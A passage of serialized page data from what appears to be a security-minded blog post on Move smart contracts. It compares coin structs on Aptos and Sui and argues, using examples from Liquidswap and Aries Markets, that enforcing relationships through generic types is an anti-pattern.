}\n",[8363],{"type":26,"tag":130,"props":8364,"children":8365},{"__ignoreMap":7},[8366,8374,8421,8429,8450],{"type":26,"tag":137,"props":8367,"children":8368},{"class":5559,"line":5560},[8369],{"type":26,"tag":137,"props":8370,"children":8371},{"style":5564},[8372],{"type":32,"value":8373},"  /// Main structure representing a coin/token in an account's custody.\n",{"type":26,"tag":137,"props":8375,"children":8376},{"class":5559,"line":5412},[8377,8382,8387,8392,8397,8402,8407,8412,8417],{"type":26,"tag":137,"props":8378,"children":8379},{"style":5573},[8380],{"type":32,"value":8381},"  struct",{"type":26,"tag":137,"props":8383,"children":8384},{"style":6009},[8385],{"type":32,"value":8386}," Coin",{"type":26,"tag":137,"props":8388,"children":8389},{"style":5601},[8390],{"type":32,"value":8391},"\u003C",{"type":26,"tag":137,"props":8393,"children":8394},{"style":5584},[8395],{"type":32,"value":8396},"phantom",{"type":26,"tag":137,"props":8398,"children":8399},{"style":6009},[8400],{"type":32,"value":8401}," CoinType",{"type":26,"tag":137,"props":8403,"children":8404},{"style":5601},[8405],{"type":32,"value":8406},"> ",{"type":26,"tag":137,"props":8408,"children":8409},{"style":5584},[8410],{"type":32,"value":8411},"has",{"type":26,"tag":137,"props":8413,"children":8414},{"style":5584},[8415],{"type":32,"value":8416}," store",{"type":26,"tag":137,"props":8418,"children":8419},{"style":5601},[8420],{"type":32,"value":5875},{"type":26,"tag":137,"props":8422,"children":8423},{"class":5559,"line":5417},[8424],{"type":26,"tag":137,"props":8425,"children":8426},{"style":5564},[8427],{"type":32,"value":8428},"      /// Amount of coin this address has.\n",{"type":26,"tag":137,"props":8430,"children":8431},{"class":5559,"line":5642},[8432,8437,8441,8446],{"type":26,"tag":137,"props":8433,"children":8434},{"style":5584},[8435],{"type":32,"value":8436},"      value",{"type":26,"tag":137,"props":8438,"children":8439},{"style":5590},[8440],{"type":32,"value":7072},{"type":26,"tag":137,"props":8442,"children":8443},{"style":6009},[8444],{"type":32,"value":8445}," u64",{"type":26,"tag":137,"props":8447,"children":8448},{"style":5601},[8449],{"type":32,"value":6099},{"type":26,"tag":137,"props":8451,"children":8452},{"class":5559,"line":5745},[8453],{"type":26,"tag":137,"props":8454,"children":8455},{"style":5601},[8456],{"type":32,"value":8457},"  }\n",{"type":26,"tag":35,"props":8459,"children":8460},{},[8461],{"type":26,"tag":762,"props":8462,"children":8463},{},[8464],{"type":32,"value":8465},"aptos",{"type":26,"tag":5512,"props":8467,"children":8469},{"className":5552,"code":8468,"language":5551,"meta":7,"style":7},"  /// A coin of type `T` worth `value`. Transferable and storable\n  struct Coin\u003Cphantom T> has key, store {\n      id: UID,\n      balance: Balance\u003CT>\n  }\n",[8470],{"type":26,"tag":130,"props":8471,"children":8472},{"__ignoreMap":7},[8473,8481,8531,8548,8578],{"type":26,"tag":137,"props":8474,"children":8475},{"class":5559,"line":5560},[8476],{"type":26,"tag":137,"props":8477,"children":8478},{"style":5564},[8479],{"type":32,"value":8480},"  /// A coin of type `T` worth `value`. Transferable and storable\n",{"type":26,"tag":137,"props":8482,"children":8483},{"class":5559,"line":5412},[8484,8488,8492,8496,8500,8505,8509,8513,8518,8522,8527],{"type":26,"tag":137,"props":8485,"children":8486},{"style":5573},[8487],{"type":32,"value":8381},{"type":26,"tag":137,"props":8489,"children":8490},{"style":6009},[8491],{"type":32,"value":8386},{"type":26,"tag":137,"props":8493,"children":8494},{"style":5601},[8495],{"type":32,"value":8391},{"type":26,"tag":137,"props":8497,"children":8498},{"style":5584},[8499],{"type":32,"value":8396},{"type":26,"tag":137,"props":8501,"children":8502},{"style":6009},[8503],{"type":32,"value":8504}," T",{"type":26,"tag":137,"props":8506,"children":8507},{"style":5601},[8508],{"type":32,"value":8406},{"type":26,"tag":137,"props":8510,"children":8511},{"style":5584},[8512],{"type":32,"value":8411},{"type":26,"tag":137,"props":8514,"children":8515},{"style":5584},[8516],{"type":32,"value":8517}," key",{"type":26,"tag":137,"props":8519,"children":8520},{"style":5601},[8521],{"type":32,"value":1108},{"type":26,"tag":137,"props":8523,"children":8524},{"style":5584},[8525],{"type":32,"value":8526},"store",{"type":26,"tag":137,"props":8528,"children":8529},{"style":5601},[8530],{"type":32,"value":5875},{"type":26,"tag":137,"props":8532,"children":8533},{"class":5559,"line":5417},[8534,8539,8543],{"type":26,"tag":137,"props":8535,"children":8536},{"style":5584},[8537],{"type":32,"value":8538},"      id",{"type":26,"tag":137,"props":8540,"children":8541},{"style":5590},[8542],{"type":32,"value":7072},{"type":26,"tag":137,"props":8544,"children":8545},{"style":5601},[8546],{"type":32,"value":8547}," UID,\n",{"type":26,"tag":137,"props":8549,"children":8550},{"class":5559,"line":5642},[8551,8556,8560,8565,8569,8573],{"type":26,"tag":137,"props":8552,"children":8553},{"style":5584},[8554],{"type":32,"value":8555},"      balance",{"type":26,"tag":137,"props":8557,"children":8558},{"style":5590},[8559],{"type":32,"value":7072},{"type":26,"tag":137,"props":8561,"children":8562},{"style":6009},[8563],{"type":32,"value":8564}," Balance",{"type":26,"tag":137,"props":8566,"children":8567},{"style":5601},[8568],{"type":32,"value":8391},{"type":26,"tag":137,"props":8570,"children":8571},{"style":6009},[8572],{"type":32,"value":2064},{"type":26,"tag":137,"props":8574,"children":8575},{"style":5601},[8576],{"type":32,"value":8577},">\n",{"type":26,"tag":137,"props":8579,"children":8580},{"class":5559,"line":5745},[8581],{"type":26,"tag":137,"props":8582,"children":8583},{"style":5601},[8584],{"type":32,"value":8457},{"type":26,"tag":35,"props":8586,"children":8587},{},[8588],{"type":26,"tag":762,"props":8589,"children":8590},{},[8591],{"type":32,"value":8592},"sui",{"type":26,"tag":35,"props":8594,"children":8595},{},[8596,8598,8605,8607,8613],{"type":32,"value":8597},"Pulling an example from ",{"type":26,"tag":41,"props":8599,"children":8602},{"href":8600,"rel":8601},"https://pontem.network/",[45],[8603],{"type":32,"value":8604},"Pontem Network's",{"type":32,"value":8606}," Liquidswap DEX implementation on Aptos, we can see that ",{"type":26,"tag":130,"props":8608,"children":8610},{"className":8609},[],[8611],{"type":32,"value":8612},"LiquidityPool",{"type":32,"value":8614}," natively embeds this type information into it's fields.",{"type":26,"tag":5512,"props":8616,"children":8618},{"className":5552,"code":8617,"language":5551,"meta":7,"style":7},"    /// Liquidity pool with reserves.\n    struct LiquidityPool\u003Cphantom X, phantom Y, phantom LP> has key {\n        coin_x_reserve: Coin\u003CX>,\n        coin_y_reserve: Coin\u003CY>,\n        // ...\n    }\n",[8619],{"type":26,"tag":130,"props":8620,"children":8621},{"__ignoreMap":7},[8622,8630,8694,8724,8753,8761],{"type":26,"tag":137,"props":8623,"children":8624},{"class":5559,"line":5560},[8625],{"type":26,"tag":137,"props":8626,"children":8627},{"style":5564},[8628],{"type":32,"value":8629},"    /// Liquidity pool with reserves.\n",{"type":26,"tag":137,"props":8631,"children":8632},{"class":5559,"line":5412},[8633,8638,8643,8647,8651,8656,8660,8664,8669,8673,8677,8682,8686,8690],{"type":26,"tag":137,"props":8634,"children":8635},{"style":5573},[8636],{"type":32,"value":8637},"    struct",{"type":26,"tag":137,"props":8639,"children":8640},{"style":6009},[8641],{"type":32,"value":8642}," LiquidityPool",{"type":26,"tag":137,"props":8644,"children":8645},{"style":5601},[8646],{"type":32,"value":8391},{"type":26,"tag":137,"props":8648,"children":8649},{"style":5584},[8650],{"type":32,"value":8396},{"type":26,"tag":137,"props":8652,"children":8653},{"style":6009},[8654],{"type":32,"value":8655}," X",{"type":26,"tag":137,"props":8657,"children":8658},{"style":5601},[8659],{"type":32,"value":1108},{"type":26,"tag":137,"props":8661,"children":8662},{"style":5584},[8663],{"type":32,"value":8396},{"type":26,"tag":137,"props":8665,"children":8666},{"style":6009},[8667],{"type":32,"value":8668}," Y",{"type":26,"tag":137,"props":8670,"children":8671},{"style":5601},[8672],{"type":32,"value":1108},{"type":26,"tag":137,"props":8674,"children":8675},{"style":5584},[8676],{"type":32,"value":8396},{"type":26,"tag":137,"props":8678,"children":8679},{"style":5601},[8680],{"type":32,"value":8681}," LP> ",{"type":26,"tag":137,"props":8683,"children":8684},{"style":5584},[8685],{"type":32,"value":8411},{"type":26,"tag":137,"props":8687,"children":8688},{"style":5584},[8689],{"type":32,"value":8517},{"type":26,"tag":137,"props":8691,"children":8692},{"style":5601},[8693],{"type":32,"value":5875},{"type":26,"tag":137,"props":8695,"children":8696},{"class":5559,"line":5417},[8697,8702,8706,8710,8714,8719],{"type":26,"tag":137,"props":8698,"children":8699},{"style":5584},[8700],{"type":32,"value":8701},"        coin_x_reserve",{"type":26,"tag":137,"props":8703,"children":8704},{"style":5590},[8705],{"type":32,"value":7072},{"type":26,"tag":137,"props":8707,"children":8708},{"style":6009},[8709],{"type":32,"value":8386},{"type":26,"tag":137,"props":8711,"children":8712},{"style":5601},[8713],{"type":32,"value":8391},{"type":26,"tag":137,"props":8715,"children":8716},{"style":6009},[8717],{"type":32,"value":8718},"X",{"type":26,"tag":137,"props":8720,"children":8721},{"style":5601},[8722],{"type":32,"value":8723},">,\n",{"type":26,"tag":137,"props":8725,"children":8726},{"class":5559,"line":5642},[8727,8732,8736,8740,8744,8749],{"type":26,"tag":137,"props":8728,"children":8729},{"style":5584},[8730],{"type":32,"value":8731},"        coin_y_reserve",{"type":26,"tag":137,"props":8733,"children":8734},{"style":5590},[8735],{"type":32,"value":7072},{"type":26,"tag":137,"props":8737,"children":8738},{"style":6009},[8739],{"type":32,"value":8386},{"type":26,"tag":137,"props":8741,"children":8742},{"style":5601},[8743],{"type":32,"value":8391},{"type":26,"tag":137,"props":8745,"children":8746},{"style":6009},[8747],{"type":32,"value":8748},"Y",{"type":26,"tag":137,"props":8750,"children":8751},{"style":5601},[8752],{"type":32,"value":8723},{"type":26,"tag":137,"props":8754,"children":8755},{"class":5559,"line":5745},[8756],{"type":26,"tag":137,"props":8757,"children":8758},{"style":5564},[8759],{"type":32,"value":8760},"        // ...\n",{"type":26,"tag":137,"props":8762,"children":8763},{"class":5559,"line":5850},[8764],{"type":26,"tag":137,"props":8765,"children":8766},{"style":5601},[8767],{"type":32,"value":5945},{"type":26,"tag":35,"props":8769,"children":8770},{},[8771],{"type":32,"value":8772},"This has the advantage of aligning type information at compile time. It would be difficult to accidentally pass in the wrong type of coin to a function.",{"type":26,"tag":5512,"props":8774,"children":8776},{"className":5552,"code":8775,"language":5551,"meta":7,"style":7},"      public fun mint\u003CX, Y, LP>(\n          pool_addr: address,\n          coin_x: Coin\u003CX>,\n          coin_y: Coin\u003CY>\n      ): Coin\u003CLP> acquires LiquidityPool, EventsStore {\n          // ...\n\n          let (x_reserve_size, y_reserve_size) = get_reserves_size\u003CX, Y, LP>(pool_addr);\n",[8777],{"type":26,"tag":130,"props":8778,"children":8779},{"__ignoreMap":7},[8780,8819,8840,8868,8896,8947,8955,8962],{"type":26,"tag":137,"props":8781,"children":8782},{"class":5559,"line":5560},[8783,8788,8793,8798,8802,8806,8810,8814],{"type":26,"tag":137,"props":8784,"children":8785},{"style":5584},[8786],{"type":32,"value":8787},"      public",{"type":26,"tag":137,"props":8789,"children":8790},{"style":5584},[8791],{"type":32,"value":8792}," fun",{"type":26,"tag":137,"props":8794,"children":8795},{"style":5584},[8796],{"type":32,"value":8797}," mint",{"type":26,"tag":137,"props":8799,"children":8800},{"style":5601},[8801],{"type":32,"value":8391},{"type":26,"tag":137,"props":8803,"children":8804},{"style":6009},[8805],{"type":32,"value":8718},{"type":26,"tag":137,"props":8807,"children":8808},{"style":5601},[8809],{"type":32,"value":1108},{"type":26,"tag":137,"props":8811,"children":8812},{"style":6009},[8813],{"type":32,"value":8748},{"type":26,"tag":137,"props":8815,"children":8816},{"style":5601},[8817],{"type":32,"value":8818},", LP>(\n",{"type":26,"tag":137,"props":8820,"children":8821},{"class":5559,"line":5412},[8822,8827,8831,8836],{"type":26,"tag":137,"props":8823,"children":8824},{"style":5584},[8825],{"type":32,"value":8826},"          pool_addr",{"type":26,"tag":137,"props":8828,"children":8829},{"style":5590},[8830],{"type":32,"value":7072},{"type":26,"tag":137,"props":8832,"children":8833},{"style":5584},[8834],{"type":32,"value":8835}," address",{"type":26,"tag":137,"props":8837,"children":8838},{"style":5601},[8839],{"type":32,"value":6099},{"type":26,"tag":137,"props":8841,"children":8842},{"class":5559,"line":5417},[8843,8848,8852,8856,8860,8864],{"type":26,"tag":137,"props":8844,"children":8845},{"style":5584},[8846],{"type":32,"value":8847},"          coin_x",{"type":26,"tag":137,"props":8849,"children":8850},{"style":5590},[8851],{"type":32,"value":7072},{"type":26,"tag":137,"props":8853,"children":8854},{"style":6009},[8855],{"type":32,"value":8386},{"type":26,"tag":137,"props":8857,"children":8858},{"style":5601},[8859],{"type":32,"value":8391},{"type":26,"tag":137,"props":8861,"children":8862},{"style":6009},[8863],{"type":32,"value":8718},{"type":26,"tag":137,"props":8865,"children":8866},{"style":5601},[8867],{"type":32,"value":8723},{"type":26,"tag":137,"props":8869,"children":8870},{"class":5559,"line":5642},[8871,8876,8880,8884,8888,8892],{"type":26,"tag":137,"props":8872,"children":8873},{"style":5584},[8874],{"type":32,"value":8875},"          coin_y",{"type":26,"tag":137,"props":8877,"children":8878},{"style":5590},[8879],{"type":32,"value":7072},{"type":26,"tag":137,"props":8881,"children":8882},{"style":6009},[8883],{"type":32,"value":8386},{"type":26,"tag":137,"props":8885,"children":8886},{"style":5601},[8887],{"type":32,"value":8391},{"type":26,"tag":137,"props":8889,"children":8890},{"style":6009},[8891],{"type":32,"value":8748},{"type":26,"tag":137,"props":8893,"children":8894},{"style":5601},[8895],{"type":32,"value":8577},{"type":26,"tag":137,"props":8897,"children":8898},{"class":5559,"line":5745},[8899,8904,8908,8912,8916,8921,8925,8930,8934,8938,8943],{"type":26,"tag":137,"props":8900,"children":8901},{"style":5601},[8902],{"type":32,"value":8903},"      )",{"type":26,"tag":137,"props":8905,"children":8906},{"style":5590},[8907],{"type":32,"value":7072},{"type":26,"tag":137,"props":8909,"children":8910},{"style":6009},[8911],{"type":32,"value":8386},{"type":26,"tag":137,"props":8913,"children":8914},{"style":5601},[8915],{"type":32,"value":8391},{"type":26,"tag":137,"props":8917,"children":8918},{"style":6009},[8919],{"type":32,"value":8920},"LP",{"type":26,"tag":137,"props":8922,"children":8923},{"style":5601},[8924],{"type":32,"value":8406},{"type":26,"tag":137,"props":8926,"children":8927},{"style":5584},[8928],{"type":32,"value":8929},"acquires",{"type":26,"tag":137,"props":8931,"children":8932},{"style":6009},[8933],{"type":32,"value":8642},{"type":26,"tag":137,"props":8935,"children":8936},{"style":5601},[8937],{"type":32,"value":1108},{"type":26,"tag":137,"props":8939,"children":8940},{"style":6009},[8941],{"type":32,"value":8942},"EventsStore",{"type":26,"tag":137,"props":8944,"children":8945},{"style":5601},[8946],{"type":32,"value":5875},{"type":26,"tag":137,"props":8948,"children":8949},{"class":5559,"line":5850},[8950],{"type":26,"tag":137,"props":8951,"children":8952},{"style":5564},[8953],{"type":32,"value":8954},"          // ...\n",{"type":26,"tag":137,"props":8956,"children":8957},{"class":5559,"line":5878},[8958],{"type":26,"tag":137,"props":8959,"children":8960},{"emptyLinePlaceholder":18},[8961],{"type":32,"value":6276},{"type":26,"tag":137,"props":8963,"children":8964},{"class":5559,"line":5891},[8965,8970,8974,8979,8983,8988,8992,8996,9001,9005,9009,9013,9017,9022,9027],{"type":26,"tag":137,"props":8966,"children":8967},{"style":5573},[8968],{"type":32,"value":8969},"          let",{"type":26,"tag":137,"props":8971,"children":8972},{"style":5601},[8973],{"type":32,"value":4625},{"type":26,"tag":137,"props":8975,"children":8976},{"style":5584},[8977],{"type":32,"value":8978},"x_reserve_size",{"type":26,"tag":137,"props":8980,"children":8981},{"style":5601},[8982],{"type":32,"value":1108},{"type":26,"tag":137,"props":8984,"children":8985},{"style":5584},[8986],{"type":32,"value":8987},"y_reserve_size",{"type":26,"tag":137,"props":8989,"children":8990},{"style":5601},[8991],{"type":32,"value":5671},{"type":26,"tag":137,"props":8993,"children":8994},{"style":5590},[8995],{"type":32,"value":289},{"type":26,"tag":137,"props":8997,"children":8998},{"style":5584},[8999],{"type":32,"value":9000}," get_reserves_size",{"type":26,"tag":137,"props":9002,"children":9003},{"style":5601},[9004],{"type":32,"value":8391},{"type":26,"tag":137,"props":9006,"children":9007},{"style":6009},[9008],{"type":32,"value":8718},{"type":26,"tag":137,"props":9010,"children":9011},{"style":5601},[9012],{"type":32,"value":1108},{"type":26,"tag":137,"props":9014,"children":9015},{"style":6009},[9016],{"type":32,"value":8748},{"type":26,"tag":137,"props":9018,"children":9019},{"style":5601},[9020],{"type":32,"value":9021},", LP>(",{"type":26,"tag":137,"props":9023,"children":9024},{"style":5584},[9025],{"type":32,"value":9026},"pool_addr",{"type":26,"tag":137,"props":9028,"children":9029},{"style":5601},[9030],{"type":32,"value":6430},{"type":26,"tag":35,"props":9032,"children":9033},{},[9034,9036,9042,9043,9050],{"type":32,"value":9035},"As an aside, this generic type information is implemented at runtime in the ",{"type":26,"tag":130,"props":9037,"children":9039},{"className":9038},[],[9040],{"type":32,"value":9041},"ty_args",{"type":32,"value":1011},{"type":26,"tag":41,"props":9044,"children":9047},{"href":9045,"rel":9046},"https://github.com/move-language/move/blob/2412f877a5065132f31bfc339e6d1f2b9de10e87/language/move-vm/runtime/src/interpreter.rs#L88",[45],[9048],{"type":32,"value":9049},"at the vm level",{"type":32,"value":9051},". This VM level implementation choice makes it rather difficult to iterate over arbitrary generic types, such as with summing the coins in a pool. We will be releasing a deep dive into move's VM internals shortly.",{"type":26,"tag":35,"props":9053,"children":9054},{},[9055,9057,9063,9065,9071,9072,9078,9079,9085],{"type":32,"value":9056},"In pseucode, this checks that ",{"type":26,"tag":130,"props":9058,"children":9060},{"className":9059},[],[9061],{"type":32,"value":9062},"coin_x.type",{"type":32,"value":9064}," is equal to ",{"type":26,"tag":130,"props":9066,"children":9068},{"className":9067},[],[9069],{"type":32,"value":9070},"pool.x_type",{"type":32,"value":3525},{"type":26,"tag":130,"props":9073,"children":9075},{"className":9074},[],[9076],{"type":32,"value":9077},"coin_y.type",{"type":32,"value":9064},{"type":26,"tag":130,"props":9080,"children":9082},{"className":9081},[],[9083],{"type":32,"value":9084},"pool.y_type",{"type":32,"value":470},{"type":26,"tag":35,"props":9087,"children":9088},{},[9089],{"type":32,"value":9090},"This type system has two advantages",{"type":26,"tag":4820,"props":9092,"children":9093},{},[9094,9106],{"type":26,"tag":3430,"props":9095,"children":9096},{},[9097,9099,9104],{"type":32,"value":9098},"It's required. The type parameter ",{"type":26,"tag":762,"props":9100,"children":9101},{},[9102],{"type":32,"value":9103},"must",{"type":32,"value":9105}," be specified so it's impossible to forget such a constraint",{"type":26,"tag":3430,"props":9107,"children":9108},{},[9109],{"type":32,"value":9110},"It's concise. Constraints are done via type parameter alignment instead of verbose equivalence checks",{"type":26,"tag":35,"props":9112,"children":9113},{},[9114],{"type":32,"value":9115},"However, this system isn't perfect.",{"type":26,"tag":35,"props":9117,"children":9118},{},[9119,9121,9126],{"type":32,"value":9120},"In fact, I would go as far as to argue that using types to create such associations is ",{"type":26,"tag":84,"props":9122,"children":9123},{},[9124],{"type":32,"value":9125},"an anti-pattern",{"type":32,"value":470},{"type":26,"tag":35,"props":9128,"children":9129},{},[9130,9132,9138],{"type":32,"value":9131},"Using types to enforce relationships only works because types are uniquely associated with instances. For example, in Aptos's coin initialization function, they explicitly assert that there hasn't been a previously initialized ",{"type":26,"tag":130,"props":9133,"children":9135},{"className":9134},[],[9136],{"type":32,"value":9137},"CoinInfo\u003CCoinType>",{"type":32,"value":470},{"type":26,"tag":5512,"props":9140,"children":9142},{"className":5552,"code":9141,"language":5551,"meta":7,"style":7},"  fun initialize_internal\u003CCoinType>(\n      // ...\n  ): (BurnCapability\u003CCoinType>, FreezeCapability\u003CCoinType>, MintCapability\u003CCoinType>) {\n      // ...\n\n      assert!(\n          !exists\u003CCoinInfo\u003CCoinType>>(account_addr),\n          error::already_exists(ECOIN_INFO_ALREADY_PUBLISHED),\n      );\n",[9143],{"type":26,"tag":130,"props":9144,"children":9145},{"__ignoreMap":7},[9146,9173,9181,9250,9257,9264,9276,9321,9343],{"type":26,"tag":137,"props":9147,"children":9148},{"class":5559,"line":5560},[9149,9154,9159,9163,9168],{"type":26,"tag":137,"props":9150,"children":9151},{"style":5584},[9152],{"type":32,"value":9153},"  fun",{"type":26,"tag":137,"props":9155,"children":9156},{"style":5584},[9157],{"type":32,"value":9158}," initialize_internal",{"type":26,"tag":137,"props":9160,"children":9161},{"style":5601},[9162],{"type":32,"value":8391},{"type":26,"tag":137,"props":9164,"children":9165},{"style":6009},[9166],{"type":32,"value":9167},"CoinType",{"type":26,"tag":137,"props":9169,"children":9170},{"style":5601},[9171],{"type":32,"value":9172},">(\n",{"type":26,"tag":137,"props":9174,"children":9175},{"class":5559,"line":5412},[9176],{"type":26,"tag":137,"props":9177,"children":9178},{"style":5564},[9179],{"type":32,"value":9180},"      // ...\n",{"type":26,"tag":137,"props":9182,"children":9183},{"class":5559,"line":5417},[9184,9189,9193,9197,9202,9206,9210,9215,9220,9224,9228,9232,9237,9241,9245],{"type":26,"tag":137,"props":9185,"children":9186},{"style":5601},[9187],{"type":32,"value":9188},"  )",{"type":26,"tag":137,"props":9190,"children":9191},{"style":5590},[9192],{"type":32,"value":7072},{"type":26,"tag":137,"props":9194,"children":9195},{"style":5601},[9196],{"type":32,"value":4625},{"type":26,"tag":137,"props":9198,"children":9199},{"style":6009},[9200],{"type":32,"value":9201},"BurnCapability",{"type":26,"tag":137,"props":9203,"children":9204},{"style":5601},[9205],{"type":32,"value":8391},{"type":26,"tag":137,"props":9207,"children":9208},{"style":6009},[9209],{"type":32,"value":9167},{"type":26,"tag":137,"props":9211,"children":9212},{"style":5601},[9213],{"type":32,"value":9214},">, ",{"type":26,"tag":137,"props":9216,"children":9217},{"style":6009},[9218],{"type":32,"value":9219},"FreezeCapability",{"type":26,"tag":137,"props":9221,"children":9222},{"style":5601},[9223],{"type":32,"value":8391},{"type":26,"tag":137,"props":9225,"children":9226},{"style":6009},[9227],{"type":32,"value":9167},{"type":26,"tag":137,"props":9229,"children":9230},{"style":5601},[9231],{"type":32,"value":9214},{"type":26,"tag":137,"props":9233,"children":9234},{"style":6009},[9235],{"type":32,"value":9236},"MintCapability",{"type":26,"tag":137,"props":9238,"children":9239},{"style":5601},[9240],{"type":32,"value":8391},{"type":26,"tag":137,"props":9242,"children":9243},{"style":6009},[9244],{"type":32,"value":9167},{"type":26,"tag":137,"props":9246,"children":9247},{"style":5601},[9248],{"type":32,"value":9249},">) {\n",{"type":26,"tag":137,"props":9251,"children":9252},{"class":5559,"line":5642},[9253],{"type":26,"tag":137,"props":9254,"children":9255},{"style":5564},[9256],{"type":32,"value":9180},{"type":26,"tag":137,"props":9258,"children":9259},{"class":5559,"line":5745},[9260],{"type":26,"tag":137,"props":9261,"children":9262},{"emptyLinePlaceholder":18},[9263],{"type":32,"value":6276},{"type":26,"tag":137,"props":9265,"children":9266},{"class":5559,"line":5850},[9267,9272],{"type":26,"tag":137,"props":9268,"children":9269},{"style":5682},[9270],{"type":32,"value":9271},"      assert!",{"type":26,"tag":137,"props":9273,"children":9274},{"style":5601},[9275],{"type":32,"value":6054},{"type":26,"tag":137,"props":9277,"children":9278},{"class":5559,"line":5878},[9279,9284,9289,9293,9298,9302,9306,9311,9316],{"type":26,"tag":137,"props":9280,"children":9281},{"style":5590},[9282],{"type":32,"value":9283},"          !",{"type":26,"tag":137,"props":9285,"children":9286},{"style":5584},[9287],{"type":32,"value":9288},"exists",{"type":26,"tag":137,"props":9290,"children":9291},{"style":5601},[9292],{"type":32,"value":8391},{"type":26,"tag":137,"props":9294,"children":9295},{"style":6009},[9296],{"type":32,"value":9297},"CoinInfo",{"type":26,"tag":137,"props":9299,"children":9300},{"style":5601},[9301],{"type":32,"value":8391},{"type":26,"tag":137,"props":9303,"children":9304},{"style":6009},[9305],{"type":32,"value":9167},{"type":26,"tag":137,"props":9307,"children":9308},{"style":5601},[9309],{"type":32,"value":9310},">>(",{"type":26,"tag":137,"props":9312,"children":9313},{"style":5584},[9314],{"type":32,"value":9315},"account_addr",{"type":26,"tag":137,"props":9317,"children":9318},{"style":5601},[9319],{"type":32,"value":9320},"),\n",{"type":26,"tag":137,"props":9322,"children":9323},{"class":5559,"line":5891},[9324,9329,9333,9338],{"type":26,"tag":137,"props":9325,"children":9326},{"style":5601},[9327],{"type":32,"value":9328},"          error",{"type":26,"tag":137,"props":9330,"children":9331},{"style":5590},[9332],{"type":32,"value":6072},{"type":26,"tag":137,"props":9334,"children":9335},{"style":5682},[9336],{"type":32,"value":9337},"already_exists",{"type":26,"tag":137,"props":9339,"children":9340},{"style":5601},[9341],{"type":32,"value":9342},"(ECOIN_INFO_ALREADY_PUBLISHED),\n",{"type":26,"tag":137,"props":9344,"children":9345},{"class":5559,"line":5909},[9346],{"type":26,"tag":137,"props":9347,"children":9348},{"style":5601},[9349],{"type":32,"value":9350},"      );\n",{"type":26,"tag":35,"props":9352,"children":9353},{},[9354,9356,9361],{"type":32,"value":9355},"While this ",{"type":26,"tag":130,"props":9357,"children":9359},{"className":9358},[],[9360],{"type":32,"value":9297},{"type":32,"value":9362}," isn't returned directly, it still ensures uniqueness of the capability objects.",{"type":26,"tag":35,"props":9364,"children":9365},{},[9366,9368,9375],{"type":32,"value":9367},"Similarly, consider ",{"type":26,"tag":41,"props":9369,"children":9372},{"href":9370,"rel":9371},"https://ariesmarkets.xyz/",[45],[9373],{"type":32,"value":9374},"Aries Markets",{"type":32,"value":9376},", a lending/borrowing protocol building on Aptos.",{"type":26,"tag":35,"props":9378,"children":9379},{},[9380,9382,9388],{"type":32,"value":9381},"Their ",{"type":26,"tag":130,"props":9383,"children":9385},{"className":9384},[],[9386],{"type":32,"value":9387},"ReserveCoinContainer",{"type":32,"value":9389}," struct stores all the relevant data and resources for managing a lending market.",{"type":26,"tag":5512,"props":9391,"children":9393},{"className":5552,"code":9392,"language":5551,"meta":7,"style":7},"  /// The struct to hold all the underlying `Coin`s.\n  /// Stored as a resources.\n  struct ReserveCoinContainer\u003Cphantom Coin0> has key {\n      /// Stores the available `Coin`.\n      underlying_coin: Coin\u003CCoin0>,\n      /// Stores the LP `Coin` that act as collateral.\n      collateralised_lp_coin: Coin\u003CLP\u003CCoin0>>,\n      /// Mint capability for LP Coin.\n      mint_capability: MintCapability\u003CLP\u003CCoin0>>,\n      /// Burn capability for LP Coin.\n      burn_capability: BurnCapability\u003CLP\u003CCoin0>>,\n\n      // ...\n  }\n\n",[9394],{"type":26,"tag":130,"props":9395,"children":9396},{"__ignoreMap":7},[9397,9405,9413,9454,9462,9491,9499,9536,9544,9581,9589,9626,9633,9640],{"type":26,"tag":137,"props":9398,"children":9399},{"class":5559,"line":5560},[9400],{"type":26,"tag":137,"props":9401,"children":9402},{"style":5564},[9403],{"type":32,"value":9404},"  /// The struct to hold all the underlying `Coin`s.\n",{"type":26,"tag":137,"props":9406,"children":9407},{"class":5559,"line":5412},[9408],{"type":26,"tag":137,"props":9409,"children":9410},{"style":5564},[9411],{"type":32,"value":9412},"  /// Stored as a resources.\n",{"type":26,"tag":137,"props":9414,"children":9415},{"class":5559,"line":5417},[9416,9420,9425,9429,9433,9438,9442,9446,9450],{"type":26,"tag":137,"props":9417,"children":9418},{"style":5573},[9419],{"type":32,"value":8381},{"type":26,"tag":137,"props":9421,"children":9422},{"style":6009},[9423],{"type":32,"value":9424}," ReserveCoinContainer",{"type":26,"tag":137,"props":9426,"children":9427},{"style":5601},[9428],{"type":32,"value":8391},{"type":26,"tag":137,"props":9430,"children":9431},{"style":5584},[9432],{"type":32,"value":8396},{"type":26,"tag":137,"props":9434,"children":9435},{"style":6009},[9436],{"type":32,"value":9437}," Coin0",{"type":26,"tag":137,"props":9439,"children":9440},{"style":5601},[9441],{"type":32,"value":8406},{"type":26,"tag":137,"props":9443,"children":9444},{"style":5584},[9445],{"type":32,"value":8411},{"type":26,"tag":137,"props":9447,"children":9448},{"style":5584},[9449],{"type":32,"value":8517},{"type":26,"tag":137,"props":9451,"children":9452},{"style":5601},[9453],{"type":32,"value":5875},{"type":26,"tag":137,"props":9455,"children":9456},{"class":5559,"line":5642},[9457],{"type":26,"tag":137,"props":9458,"children":9459},{"style":5564},[9460],{"type":32,"value":9461},"      /// Stores the available `Coin`.\n",{"type":26,"tag":137,"props":9463,"children":9464},{"class":5559,"line":5745},[9465,9470,9474,9478,9482,9487],{"type":26,"tag":137,"props":9466,"children":9467},{"style":5584},[9468],{"type":32,"value":9469},"      underlying_coin",{"type":26,"tag":137,"props":9471,"children":9472},{"style":5590},[9473],{"type":32,"value":7072},{"type":26,"tag":137,"props":9475,"children":9476},{"style":6009},[9477],{"type":32,"value":8386},{"type":26,"tag":137,"props":9479,"children":9480},{"style":5601},[9481],{"type":32,"value":8391},{"type":26,"tag":137,"props":9483,"children":9484},{"style":6009},[9485],{"type":32,"value":9486},"Coin0",{"type":26,"tag":137,"props":9488,"children":9489},{"style":5601},[9490],{"type":32,"value":8723},{"type":26,"tag":137,"props":9492,"children":9493},{"class":5559,"line":5850},[9494],{"type":26,"tag":137,"props":9495,"children":9496},{"style":5564},[9497],{"type":32,"value":9498},"      /// Stores the LP `Coin` that act as collateral.\n",{"type":26,"tag":137,"props":9500,"children":9501},{"class":5559,"line":5878},[9502,9507,9511,9515,9519,9523,9527,9531],{"type":26,"tag":137,"props":9503,"children":9504},{"style":5584},[9505],{"type":32,"value":9506},"      